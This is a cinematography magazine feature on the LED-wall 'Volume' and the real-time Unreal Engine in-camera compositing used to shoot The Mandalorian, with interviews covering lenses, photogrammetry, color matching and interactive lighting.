This article is an expanded version of the story that appears in our February, 2020 print magazine.

A live-action Star Wars television series was George Lucas' dream for many years, but the logistics of television production made achieving the necessary scope and scale seem inconceivable. Star Wars fans would expect exotic, picturesque locations, but it simply wasn't plausible to take a crew to the deserts of Tunisia or the salt flats of Bolivia on a short schedule and limited budget. The creative team behind The Mandalorian has solved that problem.

For decades, green- and bluescreen compositing was the go-to solution for bringing fantastic environments and actors together on the screen. (Industrial Light & Magic did pioneering work with the technology for the original Star Wars movie.) However, when characters are wearing highly reflective costumes, as is the case with Mando (Pedro Pascal), the title character of The Mandalorian, the reflection of green- and bluescreen in the wardrobe causes costly problems in post-production. In addition, it's challenging for actors to perform in a "sea of blue," and for key creatives to have input on shot designs and composition.

This story was originally published in the Feb. 2020 issue of AC. Some images are additional or alternate.

In order for The Mandalorian to work, technology had to advance enough that the epic worlds of Star Wars could be rendered on an affordable scale by a team whose actual production footprint would comprise a few soundstages and a small backlot. An additional consideration was that the typical visual-effects workflow runs concurrent with production, and then extends for a lengthy post period. Even with all the power of contemporary digital visual-effects techniques and billions of computations per second, the process can take up to 12 hours or more per frame. With thousands of shots and multiple iterations, this becomes a time-consuming endeavor. The Holy Grail of visual effects — and a necessity for The Mandalorian, according to co-cinematographer and co-producer Greig Fraser, ASC, ACS — was the ability to do real-time, in-camera compositing on set.

"That was our goal," says Fraser, who had previously explored the Star Wars galaxy while shooting Rogue One: A Star Wars Story (AC Feb. '17). "We wanted to create an environment that was conducive not just to giving a composition line-up to the effects, but to actually capturing them in real time, photo-real and in-camera, so that the actors were in that environment in the right lighting — all at the moment of photography."

The solution was what might be described as the heir to rear projection — a dynamic, real-time, photo-real background played back on a massive LED video wall and ceiling, which not only provided the pixel-accurate representation of exotic background content, but was also rendered with correct camera positional data.

Mando with the Child on his ship.

If the content was created in advance of the shoot, then photographing actors, props and set pieces in front of this wall could create final in-camera visual effects — or "near" finals, with only technical fixes required, and with complete creative confidence in the composition and look of the shots. On The Mandalorian, this space was dubbed "the Volume." (Technically, a "volume" is any space defined by motion-capture technology.)

This concept was initially proposed by Kim Libreri of Epic Games while he was at Lucasfilm and it has become the basis of the technology that "Holy Grail" that makes a live-action Star Wars television series possible.

In 2014, as Rogue One was ramping up, the concept of real-time compositing was once again discussed. Technology had matured to a new level. Visual effects supervisor John Knoll had an early discussion with Fraser about this concept and the cinematographer brought up the notion of utilizing a large LED screen as a lighting instrument to incorporate interactive animated lighting on the actors and sets during composite photography utilizing playback of rough previsualized effects on the LED screens. The final animated VFX would be added in later; the screens were merely to provide interactive lighting to match the animations.

"One of the big problems of shooting blue- and greenscreen composite photography is the interactive lighting," offers Fraser. "Often, you're shooting real photography elements before the backgrounds are created and you're imagining what the interactive lighting will do — and then you have to hope that what you've done on set will match what happens in post much later on. If the director changes the backgrounds in post, then the lighting isn't going to match and the final shot will feel false."

Director and executive producer Dave Filoni and cinematographers Greig Fraser, ASC, ACS (center) and Barry "Baz" Idoine (operating camera) on the set.

For Rogue One, they built a large cylindrical LED screen and created all of the backgrounds in advance for the space battle landings on Scarif, Jedha and Eadu and all the cockpit sequences in X-Wing and U-Wing spacecraft were done in front of that LED wall as the primary source of illumination on the characters and sets. Those LED panels had a pixel pitch of 9mm (the distance between the centers of the RGB pixel clusters on the screen). Unfortunately, with the size of the pixel pitch, they could rarely get it far enough away from the camera to avoid moiré and make the image appear photo-real, so it was used purely for lighting purposes. However, because the replacement backgrounds were already built and utilized on set — the comps were extremely successful and perfectly matched the dynamic lighting.

In 2016, Lucasfilm president Kathleen Kennedy approached writer/director Jon Favreau about a potential project.

A fisheye view looking through the gap between the two back walls of the show's LED-wall system, known as "the Volume." The dark spot on the Volume ceiling is due to a different model of LED screens used there. The ceiling is mostly used for lighting purposes, and if seen on camera is replaced in post.

"I went to see Jon and ask him if we would like to do something for Disney's new streaming service," Kennedy says. "I've known that Jon has wanted to do a Star Wars project for a long time, so we started talking right away about what he could do that would push technology and that led to a whole conversation around what could change the production path; what could actually create a way in which we could make things differently?"

Favreau had just completed The Jungle Book and was embarking on The Lion King for Disney — both visual-effects heavy films.

Visual effects supervisor Richard Bluff and executive creative director and head of ILM Rob Bredow showed Favreau a number of tests that ILM had conducted including the technology of the LED wall from Rogue One. Fraser suggested with the advancements in LED technology since Rogue One that this project could leverage new panels and push the envelope on real-time, in-camera visual effects. Favreau loved the concept and decided that was the production path to take.

In the background, appearing to float in space, are the motion-tracking cameras peeking between the Volume's wall and ceiling.

The production was looking to minimize the amount of green- and bluescreen photography and requirements of post compositing to improve the quality of the environment for the actors. The LED screen provides a convincing facsimile of a real set/location and avoids the green void that can be challenging for performers.

"I was very encouraged by my experiences using similar technology on Jungle Book [AC, May '16], and using virtual cameras on The Lion King [AC, Aug. '19]," explains Favreau, series creator and executive producer. "I had also experimented with a partial video wall for the pilot episode of The Orville. With the team we had assembled between our crew, ILM, Magnopus, Epic Games, Profile Studios and Lux Machina, I felt that we had a very good chance at a positive outcome."

"The Volume is a difficult technology to understand until you stand there in front of the 'projection' on the LED screen, put an actor in front of it, and move the camera around," Fraser says. "It's hard to grasp. It's not really rear projection; it's not a TransLite because [it is a real-time, interactive image with 3D objects] and has the proper parallax; and it's photo-real, not animated, but it is generated through a gaming engine."

Idoine (left) shooting on the Volume's display of the ice-planet Maldo Kreis — one of many of the production's environment "loads" — with director Filoni watching and Karina Silva operating B camera. The fixtures with white, half-dome, ping-pong-style balls on each camera are the "Sputniks" — infrared-marker configurations that are seen by the motion-tracking cameras to record the production camera's position in 3D space, and to render proper 3D parallax on the Volume wall.

"The technology that we were able to innovate on The Mandalorian would not have been possible had we not developed technologies around the challenges of Jungle Book and Lion King," offers Favreau. "We had used game-engine and motion-capture [technology] and real-time set extension that had to be rendered after the fact, so real-time render was a natural extension of this approach."

Barry "Baz" Idoine, who worked with Fraser for several years as a camera operator and second-unit cinematographer on features including Rogue One and Vice (AC Jan. '19), assumed cinematography duties on The Mandalorian when Fraser stepped away to shoot Denis Villeneuve's Dune. Idoine observes, "The strong initial value is that you're not shooting in a green-screen world and trying to emulate the light that will be comped in later — you're actually shooting finished product shots. It gives the control of cinematography back to the cinematographer."

The Volume was a curved, 20'-high-by-180'-circumference LED video wall, comprising 1,326 individual LED screens of a 2.84mm pixel pitch that created a 270-degree semicircular background with a 75'-diameter performance space topped with an LED video ceiling, which was set directly onto the main curve of the LED wall.

At the rear of the Volume, in the 90 remaining degrees of open area, essentially "behind camera," were two 18'-high-by-20'-wide flat panels of 132 more LED screens. These two panels were rigged to traveler track and chain motors in the stage's perms, so the walls could be moved into place or flown out of the way to allow better access to the Volume area.

"The Volume allows us to bring many different environments under one roof," says visual-effects supervisor Richard Bluff of ILM. "We could be shooting on the lava flats of Nevarro in the morning and in the deserts of Tatooine in the afternoon. Of course, there are practical considerations to switching over environments, but we [typically did] two environments in one day."

The crew surrounds the Mandalorian's spacecraft Razor Crest. Only the fuselage and cockpit are practical set pieces. From this still-camera position, the composition appears "broken," but from the production camera's perspective, the engines appear in perfect relationship to the fuselage, and track in parallax with the camera's movement.

"A majority of the shots were done completely in camera," Favreau adds. "And in cases where we didn't get to final pixel, the postproduction process was shortened significantly because we had already made creative choices based on what we had seen in front of us. Postproduction was mostly refining creative choices that we were not able to finalize on the set in a way that we deemed photo-real."

With traditional rear projection (and front projection), in order for the result to look believable, the camera must either remain stationary or move along a preprogrammed path to match the perspective of the projected image. In either case, the camera's center of perspective (the entrance pupil of the lens, sometimes referred to — though incorrectly — as the nodal point) must be precisely aligned with the projection system to achieve proper perspective and the effects of parallax. The Mandalorian is hardly the first production to incorporate an image-projection system for in-camera compositing, but what sets its technique apart is its ability to facilitate a moving camera.

In the pilot episode, the Mandalorian (Pedro Pascal) brings his prey (Horatio Sanz) into custody.

Indeed, using a stationary camera or one locked into a pre-set move for all of the work in the Volume was simply not acceptable for the needs of this particular production. The team therefore had to find a way to track the camera's position and movement in real-world space, and extrapolate proper perspective and parallax on the screen as the camera moved. This required incorporating motion-capture technology and a videogame engine — Epic Games' Unreal Engine — that would generate proper 3D parallax perspective in real time.

The locations depicted on the LED wall were initially modeled in rough form by visual-effects artists creating 3D models in Maya, to the specs determined by production designer Andrew Jones and visual consultant Doug Chiang. Then, wherever possible, a photogrammetry team would head to an actual location and create a 3D photographic scan.

"We realized pretty early on that the best way to get photo-real content on the screen was to photograph something," attests Visual Effects Supervisor Richard Bluff.

As amazing and advanced as the Unreal Engine's capabilities were, rendering fully virtual polygons on-the-fly didn't produce the photo-real result that the filmmakers demanded. In short, 3-D computer-rendered sets and environments were not photo-realistic enough to be utilized as in-camera final images. The best technique was to create the sets virtually, but then incorporate photographs of real-world objects, textures and locations and map those images onto the 3-D virtual objects. This technique is commonly known as tiling or photogrammetry. This is not necessarily a unique or new technique, but the incorporation of photogrammetry elements achieved the goal of creating in-camera finals.

The Mandolorian makes repairs with a rich landscape displayed behind him.

Additionally, photographic "scanning" of a location, which incorporates taking thousands of photographs from many different viewpoints to generate a 3-D photographic model, is a key component in creating the virtual environments.

Enrico Damm became the Environment Supervisor for the production and led the scanning and photogrammetry team that would travel to locations such as Iceland and Utah to shoot elements for the Star Wars planets.

The perfect weather condition for these photographic captures is a heavily overcast day, as there are little to no shadows on the landscape. A situation with harsh sunlight and hard shadows means that it cannot easily be re-lit in the virtual world. In those cases, software such as Agisoft De-Lighter was used to analyze the photographs for lighting and remove shadows to result in a more neutral canvas for virtual lighting.

Scanning is a faster, looser process than photogrammetry and it is done from multiple positions and viewpoints. For scanning, the more parallax introduced, the better the software can resolve the 3-D geometry. Damm created a custom rig where the scanner straps six cameras to their body which all fire simultaneously as the scanner moves about the location. This allows them to gather six times the images in the same amount of time — about 1,800 on average.

Photogrammetry is used to create virtual backdrops and images must be shot on a nodal rig to eliminate parallax between the photos. For Mandalorian, about 30-40% of the Volume's backdrops were created via virtual backdrops — photogrammetry images.

Each phase of photography — photogrammetry and scanning — needs to be done at various times during the day to capture different looks to the landscape.

Lidar scanning systems are sometimes also employed.

The cameras used for scanning were Canon EOS 5D MKIV and EOS 5DS with prime lenses. Zooms are sometimes incorporated as modern stitching software has gotten better about solving multiple images from different focal lengths.

The Mandalorian (aka "Mando," played by Pedro Pascal) treks through the desert alone.

This information was mapped onto 3D virtual sets and then modified or embellished as necessary to adhere to the Star Wars design aesthetic. If there wasn't a real-world location to photograph, the environments were created entirely by ILM's "environments" visual-effects team. The elements of the locations were loaded into the Unreal Engine video game platform, which provided a live, real-time, 3D environment that could react to the camera's position.

The third shot of Season 1's first episode demonstrates this technology with extreme effectiveness. The shot starts with a low angle of Mando reading a sensor on the icy planet of Maldo Kreis; he stands on a long walkway that stretches out to a series of structures on the horizon. The skies are full of dark clouds, and a light snow swirls around. Mando walks along the trail toward the structures, and the camera booms up.

All of this was captured in the Volume, in-camera and in real time. Part of the walkway was a real, practical set, but the rest of the world was the virtual image on the LED screen, and the parallax as the camera boomed up matched perfectly with the real set. The effect of this system is seamless.

Because of the enormous amount of processing power needed to create this kind of imagery, the full 180' screen and ceiling could not be rendered high-resolution, photo-real in real time. The compromise was to enter the specific lens used on the camera into the system, so that it rendered a photo-real, high-resolution image based on the camera's specific field of view at that given moment, while the rest of the screen displayed a lower-resolution image that was still effective for interactive lighting and reflections on the talent, props and physical sets. (The simpler polygon count facilitated faster rendering times.)

Idoine (far left) discusses a shot of "the Child" (aka "Baby Yoda") with director Rick Famuyiwa (third from left) and series creator/executive producer Jon Favreau (third from right), while assistant director Kim Richards (second from right, standing) and crewmembers listen. Practical set design was often used in front of the LED screen, and was designed to visually bridge the gap between the real and virtual space. The practical sets were frequently placed on risers to lift the floor and better hide the seam of the LED wall and stage floor.

Each Volume load was put into the Unreal Engine video game platform, which provided the live, real-time, 3D environment that reacted to the production camera's position — which was tracked by Profile Studios' motion-capture system via infrared (IR) cameras surrounding the top of the LED walls that monitored the IR markers mounted to the production camera. When the system recognized the X, Y, Z position of the camera, it then rendered proper 3D parallax for the camera's position in real time. That was fed from Profile into ILM's proprietary StageCraft software, which managed and recorded the information and full production workflow as it, in turn, fed the images into the Unreal Engine. The images were then output to the screens with the assistance of the Lux Machina team.

It takes 11 interlinked computers to serve the images to the wall. Three processors are dedicated to real-time rendering and four servers provide three 4K images seamlessly side-by-side on the wall and one 4K image on the ceiling. That delivers an image size of 12,288 pixels wide by 2,160 high on the wall and 4,096 x 2,160 on the ceiling. With that kind of imagery, however, the full 270 degrees (plus movable back LED walls) and ceiling cannot be rendered high-resolution photo-real in real time. The compromise is to enter in the specific lens used on the camera into the system so that it renders a photo-real high-resolution image only for the camera's specific field of view at that given moment while the rest of the screen displays a lower-resolution image that is perfectly effective for interactive lighting and reflections on the talent, props and physical sets, but of a simpler polygon count for faster rendering times.

Mando stands in a canyon on the planet Arvala. The rocks behind him are on the LED wall, while some practical rocks are placed in the mid- and foreground to blend the transition. The floor of the stage is covered in mud and rocks for this location. On the jib is an Arri Alexa LF with a Panavision Ultra Vista anamorphic lens.

Due to the 10-12 frames (roughly half a second) of latency from the time Profile's system received camera-position information to Unreal's rendering of the new position on the LED wall, if the camera moved ahead of the rendered frustum (a term defining the virtual field of view of the camera) on the screen, the transition line between the high-quality perspective render window and the lower-quality main render would be visible. To avoid this, the frustum was projected an average of 40-percent larger than the actual field of view of the camera/lens combination, to allow some safety margin for camera moves. In some cases, if the lens' field of view — and therefore the frustum — was too wide, the system could not render an image high-res enough in real time; the production would then use the image on the LED screen simply as lighting, and composite the image in post [with a greenscreen added behind the actors]. In those instances, the backgrounds were already created, and the match was seamless because those actual backgrounds had been used at the time of photography [to light the scene].

Fortunately, says Fraser, Favreau wanted The Mandalorian to have a visual aesthetic that would match that of the original Star Wars. This meant a more "grounded" camera, with slow pans and tilts, and non-aggressive camera moves — an aesthetic that helped to hide the system latency. "In addition to using some of the original camera language in Star Wars, Jon is deeply inspired by old Westerns and samurai films, so he also wanted to borrow a bit from those, especially Westerns," Fraser notes. "The Mandalorian is, in essence, a gunslinger, and he's very methodical. This gave us a set of parameters that helped define the look of the show. At no point will you see an 8mm fisheye lens in someone's face. That just doesn't work within this language.

"It was also of paramount importance to me that the result of this technology not just be 'suitable for TV,' but match that of major, high-end motion pictures," Fraser continues. "We had to push the bar to the point where no one would really know we were using new technology; they would just accept it as is. Amazingly, we were able to do just that."

Steadicam operator Simon Jayes tracks Mando, Mayfeld (Bill Burr) and Ran Malk (Mark Boone Jr.) in front of the LED wall. While the 10- to 12-frame latency of rendering the high-resolution "frustum" on the wall can be problematic, Steadicam was employed liberally in Episode 6 to great success.

Shot on Arri's Alexa LF, The Mandalorian was the maiden voyage for Panavision's full-frame Ultra Vista 1.65x anamorphic lenses. The 1.65x anamorphic squeeze allowed for full utilization of the 1.44:1 aspect ratio of the LF to create a 2.37:1 native aspect ratio, which was only slightly cropped to 2.39:1 for exhibition.

"We chose the LF for a couple reasons," explains Fraser. "Star Wars has a long history of anamorphic photography, and that aspect ratio is really key. We tested spherical lenses and cropping to 2.40, but it didn't feel right. It felt very contemporary, not like the Star Wars we grew up with. Additionally, the LF's larger sensor changes the focal length of the lens that we use for any given shot to a longer lens and reduces the overall depth of field. The T2.3 of the Ultra Vistas is more like a T0.8 in Super 35, so with less depth of field, it was easier to put the LED screen out of focus faster, which avoided a lot of issues with moiré. It allows the inherent problems in a 2D screen displaying 3D images to fall off in focus a lot faster, so the eye can't tell that those buildings that appear to be 1,000 feet away are actually being projected on a 2D screen only 20 feet from the actor.

Fraser operates an Alexa LF, shooting a close-up of the Ugnaught Kuiil (Misty Rosas in the suit, voiced by Nick Nolte). The transition between the bottom of the LED wall and the stage floor is clearly seen here. That area was often obscured by physical production design or replaced in post.

"The Ultra Vistas were a great choice for us because they have a good amount of character and softness," Fraser continues. "Photographing the chrome helmet on Mando is a challenge — its super-sharp edges can quickly look video-like if the lens is too sharp. Having a softer acutance in the lens, which [Panavision senior vice president of optical engineering and ASC associate] Dan Sasaki [modified] for us, really helped. The lens we used for Mando tended to be a little too soft for human faces, so we usually shot Mando wide open, compensating for that with ND filters, and shot people 2⁄3 stop or 1 stop closed."

According to Idoine, the production used 50mm, 65mm, 75mm, 100mm, 135mm, 150mm and 180mm Ultra Vistas that range from T2 to T2.8, and he and Fraser tended to expose at T2.5-T3.5. "Dan Sasaki gave us two prototype Ultra Vistas to test in June 2018," he says, "and from that we worked out what focal-length range to build.

Director Bryce Dallas Howard confers with actress Gina Carano — as mercenary Cara Dune — while shooting the episode "Chapter 4: Sanctuary."

"Our desire for cinematic imagery drove every choice," Idoine adds. And that included the incorporation of a LUT emulating Kodak's short-lived 500T 5230 color negative, a favorite of Fraser's. "I used that stock on Killing Them Softly [AC Oct. '12] and Foxcatcher [AC Dec. '14], and I just loved its creamy shadows and the slight magenta cast in the highlights," says Fraser. "For Rogue One, ILM was able to develop a LUT that emulated it, and I've been using that LUT ever since."

"Foxcatcher was the last film I shot on the stock, and then Kodak discontinued it," continues Fraser. "At the time, we had some stock left over and I asked the production if we could donate it to an Australian film student and they said 'yes,' so we sent several boxes to Australia. When I was prepping Rogue One, I decided that was the look I wanted — this 5230 stock — but it was gone. On a long shot, I wrote an email to the film student to see if he had any stock left and, unbelievably, he had 50 feet in the bottom of his fridge. I had him send that directly to ILM and they created a LUT from it that I used on Rogue and now Mandalorian."

Actor Giancarlo Esposito as Moff Gideon, an Imperial searching for the Child.

A significant key to the Volume's success creating in-camera final VFX is color matching the wall's LED output with the color matrix of the Arri Alexa LF camera. ILM's Matthias Scharfenberg, J. Schulte and their team did thorough testing of the Black Roe LED capabilities and matching that with the color sensitivity and reproduction of the LF to make them seamless partners. LEDs are very narrow band color spectrum emitters, their red, green and blue diodes output very narrow spectra of color for each diode which makes reaching some colors very difficult and further making them compatible with the color filter array on the ALEV-III was a bit of a challenge. Utilizing a carefully designed series of color patches, a calibration sequence was run on the LED wall to sync with the camera's sensitivity. This means any other model of camera shooting on the Volume will not receive proper color, but the Alexa LF will. While the color reproduction of the LEDs may not have looked right to the eye, through the camera, it appeared seamless. This means that the off-the-shelf LED panels won't quite work with the accuracy necessary for a high-end production, but, with custom tweaking, they were successful. There were limitations, however. With low light backgrounds, the screens would block up and alias in the shadows making them unsuitable for in-camera finals — although with further development of the color science this has been solved for season two.

A significant asset to the LED Volume wall and images projected from it is the interactive lighting provided on the actors, sets and props within the Volume. The light that is projected from the imagery on the LED wall provides a realistic sense of the actor (or set/props) being within that environment in a way that is rarely achievable with green- or bluescreen composite photography. If the sun is low on the horizon on the LED wall, the position of the sun on the wall will be significantly brighter than the surrounding sky. This brighter spot will create a bright highlight on the actors and objects in the Volume just as a real sun would from that position. Reflections of elements of the environment from the walls and ceiling show up in Mando's costume as if he were actually in that real-world location.

"When you're dealing with a reflective subject like Mando, the world outside the camera frame is often more important than the world you see in the camera's field of view," Fraser says. "What's behind the camera is reflected in the actor's helmet and costume, and that's crucial to selling the illusion that he's in that environment. Even if we were only shooting in one direction on a particular location, the virtual art-department would have to build a 360-degree set so we could get the interactive lighting and reflections right. This was also true for practical sets that were built onstage and on the backlot — we had to build the areas that we would never see on camera because they would be reflected in the suit. In the Volume, it's this world outside the camera that defines the lighting.

"When you think about it, unless it's a practical light in shot, all of our lighting is outside the frame — that's how we make movies," Fraser continues. "But when most of your lighting comes from the environment, you have to shape that environment carefully. We sometimes have to add a practical or a window into the design, which provides our key light even though we never see that [element] on camera."

The fight with the mudhorn likely negated any worry about helmet reflections for this scene.

The interactive lighting of the Volume also significantly reduces the requirement for traditional film production lighting equipment and crew. The light emitted from the LED screens becomes the primary lighting on the actors, sets and props within the Volume. Since this light comes from a virtual image of the set or location, the organic nature of the quality of the light on the elements within the Volume firmly ground those elements into the reality presented.

There were, of course, limitations. Although LEDs are bright and capable of emitting a good deal of light, they cannot re-create the intensity and quality of direct, natural daylight. "The sun on the LED screen looks perfect because it's been photographed, but it doesn't look good on the subjects — they look like they're in a studio," Fraser attests. "It's workable for close-ups, but not really for wide shots. For moments with real, direct sunlight, we headed out to the backlot as much as possible." That "backlot" was an open field near the Manhattan Beach Studios stages, where the art department built various sets. (Several stages were used for creating traditional sets as well.)

Overcast skies, however, proved a great source in the Volume. The skies for each "load" — the term given for each new environment loaded onto the LED walls — were based on real, photographed skies. While shooting a location, the photogrammetry team shot multiple stills at different times of day to create "sky domes." This enabled the director and cinematographer to choose the sun position and sky quality for each set. "We can create a perfect environment where you have two minutes to sunset frozen in time for an entire 10-hour day," Idoine notes. "If we need to do a turnaround, we merely rotate the sky and background, and we're ready to shoot!"

Idoine (seated at camera) in discussion with Favreau and Filoni on a practical set.

During prep, Fraser and Idoine spent a lot of time in the virtual art department, whose crew created the virtual backgrounds for the LED loads. They spent many hours going through each load to set sky-dome choices and pick the perfect time of day and sun position for each moment. They could select the sky condition they wanted, adjust the scale and the orientation, and finesse all of these attributes to find the best lighting for the scene. Basic, real-time ray tracing helped them see the effects of their choices on the virtual actors in the previs scene. These choices would then be saved and sent off to ILM, whose artists would use these rougher assets for reference and build the high-resolution digital assets.

The Virtual Art Department starts their job creating 3-D virtual sets of each location to production designer Andrew Jones' specifications and then the director and cinematographer can go into the virtual location with VR headsets and do a virtual scout. Digital actors, props and sets are added and can be moved about and coverage is chosen during the virtual scout. Then the cinematographer will follow the process as the virtual set gets further textured with photogrammetry elements and the sky domes are added.

The virtual world on the LED screen is fantastic for many uses, but obviously an actor cannot walk through the screen, so an open doorway doesn't work when it's virtual. Doors are an aspect of production design that have to be physical. If a character walks through a door, it can't be virtual, it must be real as the actor can't walk through the LED screen.

Favreau gets his western-style saloon entrance from the first episode of The Mandalorian.

If an actor is close to a set piece, it is more often preferred that piece be physical instead of virtual. If they're close to a wall, that should be a physical wall so that they are actually close to something real.

Many objects that are physical are also virtual. Even if a prop or set piece is physically constructed, it is scanned and incorporated into the virtual world so that it becomes not only a practical asset, but a digital one as well. Once it's in the virtual world, it can be turned on or off on a particular set or duplicated.

"We take objects that the art department have created and we employ photogrammetry on each item to get them into the game engine," explains Clint Spillers, Virtual Production Supervisor. "We also keep the thing that we scanned and we put it in front of the screen and we've had remarkable success getting the foreground asset and the digital object to live together very comfortably."

Another challenge on production design is the concept that every set must be executed in full 360 degrees. While in traditional filmmaking a production designer may be tempted to shortcut a design knowing that the camera will only see a small portion of a particular set, in this world the set that is off camera is just as important as the set that is seen on camera.

"This was a big revelation for us early on," attests production designer Andrew Jones. "We were, initially, thinking of this technology as a backdrop — like an advanced translight or painted backdrop — that we would shoot against and hope to get in-camera final effects. We imagined that we would design our sets as you would on a normal film: IE, the camera sees over here, so this is what we need to build. In early conversations with DP Greig Fraser he explained that the off-camera portion of the set — that might never be seen on camera — was just as vital to the effect. The whole Volume is a light box and what is behind the camera is reflected on the actor's faces, costumes, props. What's behind the camera is actually the key lighting on the talent.

IG-11 and Mando encounter their target.

"This concept radically changed how we approach the sets," Jones continues. "Anything you put in The Volume is lit by the environment, so we have to make sure that we conceptualize and construct the virtual set in its entirety of every location in full 360. Since the actor is, in essence, a chrome ball, he's reflecting what is all around him so every detail needs to be realized."

They sometimes used photogrammetry as the basis, but always relied upon the same visual-effects artists who create environments for the Star Wars films to realize these real-time worlds — "baking in" lighting choices established earlier in the pipeline with high-end, ray-traced rendering.

"I chose the sky domes that worked best for all the shots we needed for each sequence on the Volume," Fraser notes. "After they were chosen and ILM had done their work, I couldn't raise or lower the sun because the lighting and shadows would be baked in, but I could turn the whole world to adjust where the hot spot was."

Fraser noted a limitation of the adjustments that can be made to the sky domes once they're live on the Volume after ILM's finalization. The world can be rotated and the center position can be changed; the intensity and color can be adjusted, but the actual position of the sun in the sky dome can't be altered because ILM has done the ray tracing ahead of time and "baked" in the shadows of the terrain by the sun position. This is done to minimize the computations necessary to do advanced ray tracing in real time. If the chosen position changes, those baked-in shadows won't change, only the elements that are reserved for real-time rendering and simple ray tracing will be affected. This would make the backgrounds look false and fake as the lighting direction wouldn't match the baked-in shadows.

From time to time, traditional lighting fixtures were added to augment the output of the Volume.

In the fourth episode, the Mandalorian is looking to lay low and travels to the remote farming planet of Sorgan and visits the common house, which is a thatched, basket-weave structure. The actual common house was a miniature built by the art department and then photographed to be included in the virtual world. The miniature was lit with a single, hard light source that emulated natural daylight breaking through the thatched walls. "You could clearly see that one side of the common house was in hard light and the other side was in shadow," recalls Idoine. "There were hot spots in the model that really looked great so we incorporated LED "movers" with slash gobos and Charlie Bars [long flags] to break up the light in a similar basket-weave pattern. Because of this very open basket-weave construction and the fact that the load had a lot of shafts of light, I added in random slashes of hard light into the practical set and it mixed really well."

The Volume could incorporate virtual lighting, too, via the "Brain Bar," a NASA Mission Control-like section of the soundstage where as many as a dozen artists from ILM, Unreal and Profile sat at workstations and made the technology of the Volume function. Their work was able to incorporate on-the-fly color-correction adjustments and virtual-lighting tools, among other tweaks.

Matt Madden, president of Profile and a member of the Brain Bar team, worked closely with Fraser, Idoine and gaffer Jeff Webster to incorporate virtual-lighting tools via an iPad that communicated back to the Bar. He could create shapes of light on the wall of any size, color and intensity. If the cinematographer wanted a large, soft source off-camera, Madden was able to create a "light card" of white just outside the frustum. The entire wall outside the camera's angle of view could be a large light source of any intensity or color that the LEDs could reproduce.

In this case, a LED wall was made up of Roe Black Pearl BP2 screens with a max brightness of 1800 nits. 10.674 nits are equal to 1 foot candle of light. At peak brightness, the wall could create an intensity of about 168 foot candles. That's the equivalent of an f/8 3/4 at 800 ISO (24fps 180-degree shutter). While the Volume was never shot at peak full white, any lighting "cards" that were added were capable of outputting this brightness.

Idoine discovered that a great additional source for Mando was a long, narrow band of white near the top of the LED wall. "This wraparound source created a great backlight look on Mando's helmet," Idoine says. Alternatively, he and Fraser could request a tall, narrow band of light on the wall that would reflect on Mando's full suit, similar to the way a commercial photographer might light a wine bottle or a car — using specular reflections to define shape.

Additionally, virtual black flags — meaning areas where the LED wall were set to black — could be added wherever needed, and at whatever size. The transparency of the black could also be adjusted to any percentage to create virtual nets.

Kuiil on his Blerg.

The virtual LED environments were hugely successful, but traditional greenscreen still played a significant role in the production of The Mandalorian, and it was always on hand — especially for situations where the frustum was too wide for the system to adequately respond. The Volume was also capable of producing virtual greenscreen on the LED wall, which could be any size, and any hue or saturation of green. Among the benefits of virtual green-screen were that it required no time to set up or rig, and its size could be set to precisely outline the subject to be replaced — which greatly minimized and sometimes even eliminated green spill.

There are many benefits to the virtual greenscreen. It is nearly immediate, requiring no rigging, stands, time to set up or additional lighting. It can be any size, meaning the green is really only the perfect size to outline the subject to be replaced. When this happens there is no (or extremely limited) green spill on the actors or reflected in other objects around the set. This all but eliminates the requirement for de-spilling green in post; a timely and tedious process.

The virtual greenscreens can, of course, only be on the LED wall. If lower portions of an actor's body or set piece needs to be composited, then physical green screen is required as the floor is not an LED screen and a virtual green cannot extend past the LED wall.

When green is employed, live compositing is possible for the camera operator's on-board monitor and the director's monitor so that they can see the elements that will be composited into the shot and compose the framing accordingly.

The Mandalorian workflow was somewhat inverted, because — unlike on typical productions — virtual backgrounds and CG elements had to be finished before principal photography commenced. Once the cinematographer approved the locations and lighting in the virtual art-department, the images were delivered to ILM for their work, which took about six weeks to complete for each load. At the time of photography, some manipulation and alteration of the virtual elements could take place, but many decisions about coverage, blocking and lighting were already locked in. Naturally, this required a degree of collaboration among the director, cinematographer, production designer and visual-effects supervisor that was closer than that on a typical production. But, as Fraser notes, it also meant that the cinematographer was hands-on throughout the creation of all the images.

"In today's production workflow, the cinematographer comes in to prep the film and then shoots and then is sent away until the grading process — so much work with the image happens in post that we're not a part of," asserts Fraser. "This inverted production workflow of The Mandalorian keeps the cinematographer in the loop from the development of the image to the final image, which is often captured in-camera. Baz and I are there to shepherd the image through the whole process and this is so supremely important. Cinematographers work to design imagery every day, 12 hours a day, and we know how to look at an image and know immediately if its right or wrong. Visual effects artists have amazing skills, but they don't always have the photographic experience to know what is right or wrong and a lot of times what we plan and photograph doesn't get translated through post. With this kind of workflow we supervise every element of the shot and have a much closer partnership with visual effects to make sure that it works with what we and the director planned and executed on set. We get that final shot in camera and the result is pretty amazing."

"I personally enjoy that pipeline," Favreau attests. "I have tried to learn as much as I could from the way animation approaches the pre-production and production schedule. I think the earlier in the process you can solve story issues, the more efficient the production process becomes. Animation has traditionally front-loaded the story process, whereas live-action allows you to kick the can down the road."

The Bounty Hunter IG-11 is after the asset.

The ability to select the perfect lighting conditions would seem to allow a cinematographer the ability to create the perfect look for every shot. How wonderful would it be to have magic hour all day long; or even all week long for that matter?! Yet Fraser is keenly aware of making things too perfect and introducing an unnecessary artifice to the overall visual style of the show. "I won't always want it to be a perfect backlight, because that ends up looking fake," Fraser attests. "It's not real. In the real world, we have to shoot at different times and we have to compromise a little, so if I build in a little bit of 'roughness,' it will feel more real and less fake. The idea is to introduce a little 'analog' to make the digital look better, to make it feel more real and make the effect even more seamless as if it were all real locations.

"That's where the system is very good," Fraser continues. "It allows you to see what you're photographing in real-time. There are times in the real world where you don't have a choice and you have to shoot something front-lit, but you still work to make it look pleasing. You shoot an exterior for four hours and the sun moves constantly and you get locked into those couple shots that aren't perfectly backlit — but that's reality. When you have the ability to make it perfect for every shot, that doesn't feel right, so we had to really think about building in some analog. Jon was really keenly aware of this, as well. He had just finished doing The Lion King with Caleb [Deschanel, ASC] and they had scenes that they would stage in direct hard noon sunlight to give the film a more realistic feeling instead of just doing everything perfectly at golden hour — that just feels false."

"We all felt a little like film students at the start of this," Fraser says. "It's all new, and we were discovering the limitations and abilities of the system as we went along. We continually pushed the system to break it and see where the edges of the envelope were — but the technology continued to evolve and allow us to push that envelope further. We'd say, 'Oh, man, I wish we could ...' and someone at the Brain Bar would say, 'Yeah, I think we can!' And the next day we'd have that ability. It was pretty amazing."

Idoine readies the camera for a scene.

